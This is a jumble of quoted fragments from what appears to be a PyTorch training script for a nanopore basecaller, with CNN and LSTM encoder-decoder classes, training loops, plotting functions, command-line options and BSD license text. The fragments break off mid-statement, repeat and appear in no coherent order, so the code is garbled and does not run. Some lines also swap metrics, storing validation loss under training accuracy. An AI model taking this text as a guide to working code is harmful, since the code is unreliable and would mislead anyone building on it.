"1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from",
"the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c',",
"= torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in range(n_epochs): if earlyStopping and",
"pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0,",
"self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port",
"parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path to the",
"torch.nn as nn from torch.autograd import Variable import torch.nn.functional as F import torchvision",
"LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional =",
"torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch",
"\"lstm_decoder\" in name and \"linear\" not in name: print(name,param.data.size()) n = param.size(0) #",
"[seq_len, batch, input_dim] # undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True)",
"editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0,",
"ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end =",
"+ \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)) if",
"# cell gate start, end = n//2, n//2 + n//4 input_biases[idx_b+2, idx] =",
"parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?',",
"acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val",
"dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm)",
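The body of init_weights_orthogonal_lstm is not among these fragments; a plausible reconstruction, orthogonalizing the LSTM weight matrices and zeroing the biases, would be:

    import torch.nn as nn

    def init_weights_orthogonal_lstm(m):          # hypothetical reconstruction
        if isinstance(m, nn.LSTM):
            for name, param in m.named_parameters():
                if "weight" in name:
                    nn.init.orthogonal_(param)    # orthogonal input/recurrent matrices
                elif "bias" in name:
                    nn.init.zeros_(param)

    # model.apply(init_weights_orthogonal_lstm) visits every submodule once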
"= data[3] batch_y10 = data[4] #Wrap them in a Variable object inputs, labels,",
"that padded items in the sequence won't be shown to the LSTM packed_seq",
"= args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip",
"* 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc",
"LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers =",
"label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2)",
"plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\") ax = fig.add_subplot(1, 3, 2)",
"OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED",
"np.linalg.norm(m[start: end], ord=2) # output gate start, end = n//2 + n//4, n",
"+ '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port),",
"forward(self, x, hidden): h, c = hidden h = h.view(h.size(0), -1) c =",
"input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val,",
"output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val",
"= acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name)",
"if we have reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95",
"distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on",
"ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\")",
"plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\") if",
"for name, param in model12.named_parameters(): if \"bias\" in name: if forget_bias != \"None\"",
"Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1],",
"self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer if self.bidirectional: if",
"order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :]",
"help=\"Make every n updates evaluation on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\",",
"unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original",
"of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have equal batch",
"[dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return",
"= make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname = args.output port =",
"n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time()",
"teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours,",
"self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim,",
"+ self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate",
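The custom cell computes all four gates in one fused linear pass and splits them with chunk(4, 1); the deprecated F.sigmoid/F.tanh calls map to torch.sigmoid/torch.tanh. A compact runnable version of the same arithmetic:

    import torch
    import torch.nn as nn

    class MinimalLSTMCell(nn.Module):
        def __init__(self, input_size, hidden_size):
            super().__init__()
            self.i2h = nn.Linear(input_size, 4 * hidden_size)
            self.h2h = nn.Linear(hidden_size, 4 * hidden_size)

        def forward(self, x, state):
            h, c = state
            gates = self.i2h(x) + self.h2h(h)
            i, f, g, o = gates.chunk(4, 1)            # same gate order as the fragments
            i, f, o = torch.sigmoid(i), torch.sigmoid(f), torch.sigmoid(o)
            g = torch.tanh(g)
            c_new = f * c + i * g                     # cy = forgetgate*c + ingate*cellgate
            h_new = o * torch.tanh(c_new)             # hy = outgate*tanh(cy)
            return h_new, (h_new, c_new)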
"= args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units #256",
"if i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i < true_y_len",
"0 matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2:",
"IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY",
"torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1,",
"Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\")",
"end = n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end)",
"are permitted provided that the following conditions are met: 1. Redistributions of source",
"result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target) return editd, num_chars",
"= np.mean(acc_iteration) dict_validation_loss2[updates] = np.mean(val_losses) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val",
"without modification, are permitted provided that the following conditions are met: 1. Redistributions",
"conditions are met: 1. Redistributions of source code must retain the above copyright",
"x is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder",
"ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and",
"hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False, port=1, attention=True, dropout=0):",
"args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input =",
"pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0],",
"print(\"=\" * 30) total_train_loss = 0 loss_iteration = [] acc_iteration = [] editd_iteration",
"total_ed = 0 total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader):",
"False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad =",
"(h, c) label = y[not_padded_batches, :, i] # batch-i, features, seq len y",
"AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT",
"= 0 heatmap_g = None heatmap_w = None heatmap_g_b = None heatmap_w_b =",
"bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in",
"hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input",
"break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result",
"a Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False)",
"updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training",
"# (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p,",
"parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1,",
"= [] for name in y_len: if \"bias\" in name and \"lstm\" in",
"3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()),",
"f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit",
"loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val))",
"b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)),",
"pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1],",
"form must reproduce the above copyright notice, this list of conditions and the",
"in zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i += 1",
"{}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration = [] acc_iteration =",
"num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import",
"editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0,",
"= False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim",
"true_y_len # get indices of not padded sequences true_y_len = true_y_len[not_padded_batches] # remove",
"args.batch_size epochs = args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf",
"input_size self.hidden_size = hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4 * hidden_size,",
"seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ###########################################",
"next token as next input #if not, use predicted token onehot = torch.zeros(len(top1),",
"100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path +",
"+ 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\" *",
"n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder !=",
"copyright notice, this list of conditions and the following disclaimer in the documentation",
"CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder # The Encoder # ----------- class",
"out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set,",
"print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i",
"original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu()",
"and \"bias\" in p and \"lstm\" in p and \"linear\" not in p:",
"bidir = args.bi_lstm attention = args.attention dropout = args.dropout # CNN input_bias_cnn =",
"= [] acc_iteration = [] editd_iteration = [] for iteration, data in enumerate(train_loader):",
"in_lstm = torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size x seq_length x",
"print(file_out) with open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path = script_dir +",
"= None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed =",
"= lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\" in name: if",
"c = hidden h = h.view(h.size(0), -1) c = c.view(c.size(0), -1) x =",
"= True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch size,",
"np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed # else: # ed = 0",
"* F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch",
"4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention",
"indices of not padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element =",
"batch_x = data[0] batch_y = data[1] seq_len = data[2] lab_len = data[3] batch_y10",
"data[0] batch_y = data[1] seq_len = data[2] lab_len = data[3] batch_y10 = data[4]",
"val_losses = [] val_acc = [] val_editd = [] model.eval() total_ed = 0",
"inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x",
"ed_val total_num_chars += num_char_ref if editD: cer = float(total_ed) / total_num_chars if updates",
"in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\",",
"\" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half",
"provided that the following conditions are met: 1. Redistributions of source code must",
"0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget gate start, end",
"= F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate * c)",
"Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len",
"f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args =",
"train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)]",
"pass loss.backward() #clipping_value = 1 #arbitrary number of your choosing if clipping_value !=",
"0 for p, label in zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out",
"0 loss_iteration = [] acc_iteration = [] editd_iteration = [] for iteration, data",
"dict_activations_forget = {} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder",
"and decoder must have equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder",
"int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) > 0.35",
"bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len =",
"basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname = args.output",
"self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self):",
"\"lstm\" in name and \"linear\" not in name: for b in [\"input\", \"forget\",",
"distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\")",
"lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir,",
"cer = float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation',",
"dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates]",
"ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend()",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance",
"2, i) for epoch in p.keys(): if epoch % print_epoch == 0 or",
"Forward pass through LSTM layer # shape of lstm_in: [batch, seq_len, input_dim] #",
"val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen between 1 and a",
"match with order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target,",
"= [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len)",
"folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int,",
"= { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path",
"== 0: print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\"",
"args.editD sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic =",
"'--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n",
"kernel = args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn =",
"steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1],",
"# Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim]",
"PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE",
"instances by sequence length in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx =",
":] # get only batches that are NOT padded h = hidden[0][:, not_padded_batches,",
"lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens",
"input_decoder[not_padded_batches, :] # get only batches that are NOT padded h = hidden[0][:,",
"= {} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder =",
"dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder",
".format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel size = 11 start =",
"required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU",
"writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train',",
"next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr,",
"SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND",
"forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val = val_ds[0]",
"# [batch size, out dim] return outputs, hidden # Sequence to sequence model",
"dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights",
"# output = (seq*batch, out dim), target = (seq*batch) # Target nicht one-hot",
"filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len),",
"cellgate) hy = outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu())",
"dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates)",
"[\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head())",
"= 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x,",
"teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass through LSTM layer",
"1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx] =",
"edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0],",
"args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden =",
"editD=True, reduce_lr=False): #Print all of the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS",
":]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ########################################### #####",
"plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()),",
"= list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len)))",
"#print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x)",
"clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF",
"hidden = (h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len,",
"+ \"/\" + infile print(file_out) with open(file_out, 'rb') as handle: read_data = pickle.load(handle)",
"= np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train",
"dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint =",
":] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### #####",
"early_stopping needs the validation loss to check if it has decresed, # and",
"print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30)",
"input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2)",
"list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD:",
"input_bias_cnn = args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out = args.channel_number #256",
"= torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot encode input input_decoder",
"num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim",
"dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights = {} dict_gradients",
"cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p =",
"\"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1],",
"reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if editD: # if updates",
"updates from trainings set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def",
"= random.random() < teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features # rest:",
"print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration = [] acc_iteration",
